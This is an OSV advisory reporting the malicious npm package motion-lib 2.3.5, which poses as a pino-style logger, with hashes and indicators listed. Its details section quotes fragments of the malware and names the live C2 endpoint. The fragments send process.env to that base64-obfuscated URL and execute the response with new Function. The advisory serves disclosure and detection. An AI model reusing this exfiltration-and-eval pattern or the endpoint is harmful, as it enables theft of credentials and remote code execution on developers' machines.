MAL-2026-5925

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/motion-lib/MAL-2026-5925.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5925

Published

2026-06-16T19:46:09Z

Modified

2026-06-16T21:16:47.065403493Z

Summary

Malicious code in motion-lib (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176)

motion-lib@2.3.5 masquerades as a pino-style logger (exports module.exports.pino, ships proto.js/multistream.js/transport.js/redaction.js/levels.js, advertises 'fast','logger','stream','json' keywords) but its middleware factory in index.js spawns a detached node lib/initializeCaller.js. That script shadows process with a local object whose env.DEV_API_KEY holds a base64-encoded string that decodes to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df, then POSTs the host's full real process.env to that endpoint with header x-secret-header: secret (axios.post(apiEndpoint, {...process.env },...)). The HTTP response body is then executed via new Function('require', response.data); executor(require);, giving the remote endpoint arbitrary code execution with full Node capabilities (filesystem, network, childprocess) on the installer's machine. The combination of full-environment exfiltration (AWS*, GITHUBTOKEN, NPMTOKEN, CI secrets, DB creds), eval-of-remote-response RCE, base64 obfuscation of the C2 URL, and impersonation of a popular logger package is an unambiguous supply-chain attack.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176",
            "import_time": "2026-06-16T21:06:46.893333119Z",
            "source": "amazon-inspector",
            "modified_time": "2026-06-16T19:46:09Z",
            "versions": [
                "2.3.5"
            ],
            "id": "IN-MAL-2026-006827"
        }
    ]
}

References

https://www.npmjs.com/package/motion-lib/v/2.3.5

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / motion-lib

Package

Name: motion-lib; View open source insights on deps.dev
Purl: pkg:npm/motion-lib

Affected ranges

Affected versions

2.*

2.3.5

Database specific

indicators

{
    "package_integrity": [
        {
            "filename": "motion-lib-2.3.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-VqRbZ1gRQ03qx3Gt+NIJQ21VhgaS6GT5+W5WSRbBtAw+MyeIR5O1m/Wkk7NHThZpw4n0LvpLxSjwRgYsXjWs9g==",
                "sha1": "54e31dbde7db0816917f2c63b0934be741bce117"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "fc61b0ed62e346bfbb5e1e093e475d8b3065247dc8d315f0ea4e7cafd9661bad",
            "tlsh": "f921f38e15fe101d066751e6bb2f24027022e8133946d4a47bcc835b1fc966e99936df",
            "path": "lib/initializeCaller.js"
        },
        {
            "sha256": "1f51184c197102444a2c8a23e4a8e54a6479750420512922fcb5d5f795c33911",
            "tlsh": "0f318545b5f21259126d98c4f6b4a5263cdf9437331b76b1cded93952bce2080032bc7",
            "path": "index.js"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/motion-lib/MAL-2026-5925.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]